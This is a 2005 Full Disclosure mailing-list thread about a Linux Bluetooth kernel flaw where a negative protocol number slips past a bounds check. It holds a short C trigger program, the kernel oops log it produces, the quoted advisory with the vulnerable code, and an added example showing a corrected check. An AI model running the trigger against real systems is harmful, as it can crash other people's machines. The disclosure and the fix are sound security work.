Full Disclosure mailing list archives

Re: local root security bug in linux >= 2.4.6 <= 2.4.30-rc1 and 2.6.x.y <= 2.6.11.5


From: "KF (Lists)" <kf_lists () digitalmunition com>
Date: Sun, 27 Mar 2005 16:14:50 -0500

This should be enough to determine if you are at 'potential' risk or not. I have not tested his work around so I cannot vouch for it.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

int main(void)
{
        int ctl;

        /* Open an HCI socket with a negative protocol number
           (the bounds-check bypass the advisory describes) */
        if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0)
        {
                perror("Can't open HCI socket.");
                exit(1);
        }
        close(ctl);
        return 0;
}


Mar 27 16:12:23 jdam kernel: <1>Unable to handle kernel paging request at virtual address 5f5f0073
Mar 27 16:12:23 jdam kernel: d7a2c098
Mar 27 16:12:23 jdam kernel: PREEMPT
Mar 27 16:12:23 jdam kernel: CPU:    0
Mar 27 16:12:23 jdam kernel: EIP: 0060:[__crc_dq_data_lock+94252/3474916] Not tainted
Mar 27 16:12:23 jdam kernel: EFLAGS: 00210206   (2.6.8-2-386)
Mar 27 16:12:23 jdam kernel: EIP is at bt_sock_create+0x40/0xd5 [bluetooth]
Mar 27 16:12:23 jdam kernel: eax: 5f5f0063 ebx: fffffba9 ecx: ccf2f624 edx: d7a36980
Mar 27 16:12:23 jdam kernel: esi: ccf2f600 edi: ffffffa3 ebp: ffffff9f esp: c49fdf30
Mar 27 16:12:23 jdam kernel: ds: 007b   es: 007b   ss: 0068
Mar 27 16:12:23 jdam kernel: Process test (pid: 364, threadinfo=c49fc000 task=cd4b1440)
Mar 27 16:12:23 jdam kernel: Stack: 0000001f ccf2f600 00000001 c01f82f5 ccf2f600 fffffba9 00000000 00000001
Mar 27 16:12:23 jdam kernel: bffff8dc c49fc000 c01f83fb 0000001f 00000003 fffffba9 c49fdf84 00000000
Mar 27 16:12:23 jdam kernel: c01f8430 0000001f 00000003 fffffba9 c49fdf84 00000003 00000000 c01f9015
Mar 27 16:12:23 jdam kernel: Call Trace:
Mar 27 16:12:23 jdam kernel: [__sock_create+279/518] __sock_create+0x117/0x206
Mar 27 16:12:23 jdam kernel:  [sock_create+23/27] sock_create+0x17/0x1b
Mar 27 16:12:23 jdam kernel:  [sys_socket+22/60] sys_socket+0x16/0x3c
Mar 27 16:12:23 jdam kernel: [sys_socketcall+88/384] sys_socketcall+0x58/0x180
Mar 27 16:12:23 jdam kernel:  [do_page_fault+0/1183] do_page_fault+0x0/0x49f
Mar 27 16:12:23 jdam kernel:  [error_code+45/56] error_code+0x2d/0x38
Mar 27 16:12:23 jdam kernel:  [syscall_call+7/11] syscall_call+0x7/0xb
Mar 27 16:12:23 jdam kernel: Code: 8b 50 10 85 d2 be 01 00 00 00 74 33 b8 00 e0 ff ff 21 e0 ff

-KF

Rob wrote:
advisories wrote:

Hi,
We recently discovered a security bug in the bluetooth stack of the linux kernel. This affects most linux kernels (provided that the bluetooth stack is used).

More information can be found in the attached pdf file.

Regards,
The suresec team.


I "discovered" this text in the attachment:

Suresec security advisory 1
Release date: 27th March 2005
CVE ID: CAN-2005-0750

Linux kernel local root vulnerability
About the linux kernel:
The linux kernel is a widely used kernel which is unix based.
Vulnerability summary:
The linux kernel has support for bluetooth. A local root security
vulnerability was found in this bluetooth stack.
Vulnerable code:
static int bluez_sock_create(struct socket *sock, int proto)
{
        /* only the upper bound is checked; a negative proto passes */
        if (proto >= BLUEZ_MAX_PROTO)
                return -EINVAL;
        ...
        /* proto is then used unchecked as an index into a table of function pointers */
        return bluez_proto[proto]->create(sock, proto);
}
This code can be reached by either calling socket() or alternatively
calling socketpair(). When passed a negative value for the protocol the
bounds check can be bypassed. Later the protocol number is used as an
index to a function pointer. It is possible to use proto as an index to
some kind of memory that is under a user's control.
Impact:
When properly exploited this yields local root. (exploitation is trivial)
Affected versions:
This vulnerability affects all 2.6.x(.y) <= 2.6.11.5 linux kernels and >=
2.4.6 <= 2.4.30-rc1 kernels provided that there is support for bluetooth.
Suggested Recommendations:
Update your kernel to a newer one, or alternatively we've made a
loadable kernel module which works around the problem by checking
the protocol and domain before the bluetooth socket code is called. It
can be found at:
http://www.suresec.org/tools/bluetooth_workaround.tar.gz

Credits:
Ilja van Sprundel found this vulnerability.

About us:
Suresec Ltd is a global service provider of Internet security solutions
and consultancy with unmatched quality from our world class
consultancy practice.
Our consultants have pioneered in the field of security research and
have closely worked with leading software companies and service
providers to mitigate risks and fix a number of critical vulnerabilities.
Suresec also works closely with a number of open source companies
to provide them with source code auditing and technical consultancy.
We have a strong team of consultants spread across Europe, the United
States and Australia specializing in security consulting.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


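The advisory's point is a signed comparison that only tests the upper bound, so a negative protocol number walks past the check and is then used as an array index. The following is an added example written for this archive, not code from the advisory, from KF's post or from the kernel: it puts the quoted check next to a corrected one over a constructed stand-in table (bluez_proto[], BLUEZ_MAX_PROTO, dummy_create and the proto_ops struct are all made up here to model the kernel structures) and shows a dispatch routine that validates both the index and the table slot before calling through the function pointer.

```c
/* Added example, not from the advisory or the kernel: the quoted bounds
 * check beside a corrected one, over a constructed protocol table. */
#include <stdio.h>
#include <errno.h>
#include <stddef.h>

#define BLUEZ_MAX_PROTO 8     /* constructed table size; the real value does not matter here */

struct proto_ops {
    int (*create)(int proto);
};

/* Constructed stand-in for a protocol module's create() callback. */
static int dummy_create(int proto) { return proto; }

/* Constructed stand-in for the kernel's protocol table. NULL slots model
 * protocols whose module is not loaded. */
static struct proto_ops dummy_ops = { dummy_create };
static struct proto_ops *bluez_proto[BLUEZ_MAX_PROTO] = { &dummy_ops, NULL };

/* Mirrors the check the advisory quotes: only the upper bound is tested,
 * so any negative proto gets through and would index before the table.
 * Returns 1 if the check lets proto through, 0 if it rejects it. */
int vulnerable_check_passes(int proto)
{
    if (proto >= BLUEZ_MAX_PROTO)
        return 0;
    return 1;
}

/* Corrected check: reject negatives explicitly. The one-line equivalent is
 * `(unsigned)proto >= BLUEZ_MAX_PROTO`, which folds negatives into large
 * unsigned values. */
int hardened_check_passes(int proto)
{
    if (proto < 0 || proto >= BLUEZ_MAX_PROTO)
        return 0;
    return 1;
}

/* Dispatch that validates the index and the slot before using the function
 * pointer: -EINVAL for an out-of-range proto, -EPROTONOSUPPORT for an empty
 * slot, otherwise whatever the protocol's create() returns. */
int safe_sock_create(int proto)
{
    if (!hardened_check_passes(proto))
        return -EINVAL;
    if (bluez_proto[proto] == NULL)
        return -EPROTONOSUPPORT;
    return bluez_proto[proto]->create(proto);
}

int main(void)
{
    /* -1111 is the value KF's test program passes to socket() */
    int probes[] = { 0, 1, BLUEZ_MAX_PROTO, -1, -1111 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        printf("proto %6d: quoted check %s, corrected check %s, safe_sock_create -> %d\n",
               probes[i],
               vulnerable_check_passes(probes[i]) ? "passes" : "rejects",
               hardened_check_passes(probes[i]) ? "passes" : "rejects",
               safe_sock_create(probes[i]));
    }
    return 0;
}
```

Run as-is, the table shows the quoted check letting -1 and -1111 through while rejecting only BLUEZ_MAX_PROTO, and the corrected check rejecting all three; the NULL-slot test is the second thing a dispatcher should do after the range check, since an in-range index is no guarantee that the module behind it is loaded.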